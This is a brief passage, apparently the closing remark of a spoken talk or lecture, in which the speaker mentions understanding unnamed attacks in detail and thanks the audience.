that you understand these attacks in a fair bit of detail. All right, thank you very much.